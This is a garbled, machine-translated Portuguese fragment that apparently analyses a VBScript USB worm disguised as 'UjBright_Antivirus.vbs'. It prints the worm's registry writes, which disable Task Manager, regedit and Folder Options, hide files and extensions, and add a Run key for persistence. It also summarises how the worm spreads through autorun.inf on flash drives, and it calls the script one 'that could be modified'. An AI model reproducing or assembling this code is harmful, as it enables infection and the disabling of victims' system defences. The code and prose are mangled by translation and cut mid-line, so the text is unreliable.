RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer \\ NoFolderOptions ", 1," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer \\ NoDriveTypeAutoRun ", 128," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System \\ DisableRegistryTools ", 1," REG_DWORD ".
RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System \\ DisableTaskMgr ", 1," REG_DWORD "End With Se ganhar tf &" \\ UjBright_Antivirus.vbs "Então, se fso.Getfile (tf) .Drive.IsReady = false Então WScript. Sair End If WScript.Sleep 10000 arquivo assustador Wend Big Não é. Bem, não é bem verdade. Se tiver programado com os scripts antes, então não vai ser realmente difícil conseguir isso. Depois de olhar para o código por um tempo, eu percebi o que ele fez.
Aqui está ele em breve: verificado para drives flash verificado se a execução automática, leia-me & script presente. Se não, escreve autorun.inf, cópia do script. Faça o Leia-me de lixo. Oculta as extensões de arquivos, desativa regedit, etc sono para 10000 segundos Assim, em breve foi um pequeno script agradável que poderia ser modificado. Você pode ver as partes finais, onde o registro & tarefa manjedoura está desativado, os arquivos ocultos estão escondidos, extensões estão escondidos, etc .
RegWrite "HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run \\ autome", "wscript.exe" "" & vencer & "\\ UjBright_Antivirus.vbs" "" .RegWrite "HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Avançadas \\ escondido", 1, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Avançadas \\ HideFileExt ", 1," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Av